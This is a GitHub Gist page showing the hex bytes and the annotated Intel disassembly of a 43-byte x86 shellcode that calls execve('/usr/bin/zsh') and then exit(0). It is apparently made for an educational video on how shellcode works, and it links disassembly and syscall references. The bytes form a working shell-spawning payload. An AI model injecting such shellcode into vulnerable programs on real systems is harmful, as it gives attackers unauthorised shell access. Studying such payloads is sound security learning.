Last active
March 3, 2016 10:57
-
-
Save antoneliasson/643eeec5c4b063243d9d to your computer and use it in GitHub Desktop.
Shell code used in https://www.youtube.com/watch?v=1S0aBV-Waeo
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [5.0.7]anton@balder:~> od -t x1 shell_code | |
| 0000000 31 c0 83 ec 01 88 04 24 68 2f 7a 73 68 68 2f 62 | |
| 0000020 69 6e 68 2f 75 73 72 89 e6 50 56 b0 0b 89 f3 89 | |
| 0000040 e1 31 d2 cd 80 b0 01 31 db cd 80 | |
| 0000053 | |
| [5.0.7]anton@balder:~> objdump -D -Mintel,i386 -b binary -m i386 shell_code | |
| shell_code: file format binary | |
| Disassembly of section .data: | |
| 00000000 <.data>: | |
| 0: 31 c0 xor eax,eax | |
| 2: 83 ec 01 sub esp,0x1 | |
| 5: 88 04 24 mov BYTE PTR [esp],al ; push string null terminator | |
| 8: 68 2f 7a 73 68 push 0x68737a2f | |
| d: 68 2f 62 69 6e push 0x6e69622f | |
| 12: 68 2f 75 73 72 push 0x7273752f ; push /usr/bin/zsh | |
| 17: 89 e6 mov esi,esp | |
| 19: 50 push eax ; push 0x00 (execve() argument 'argv') | |
| 1a: 56 push esi ; push pointer to path string | |
| 1b: b0 0b mov al,0xb ; eax <- syscall 0xb: execve() | |
| 1d: 89 f3 mov ebx,esi | |
| 1f: 89 e1 mov ecx,esp | |
| 21: 31 d2 xor edx,edx | |
| 23: cd 80 int 0x80 ; execve("/usr/bin/zsh", NULL, NULL) | |
| 25: b0 01 mov al,0x1 ; eax <- syscall 0x1: exit() | |
| 27: 31 db xor ebx,ebx ; exit status code = 0 | |
| 29: cd 80 int 0x80 ; exit(0) | |
| # resources: | |
| # https://stackoverflow.com/questions/1737095/how-do-i-disassemble-raw-x86-code/34424146#34424146 | |
| # http://docs.cs.up.ac.za/programming/asm/derick_tut/syscalls.html | |
| # http://www.eecg.toronto.edu/~amza/www.mindsec.com/files/x86regs.html |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment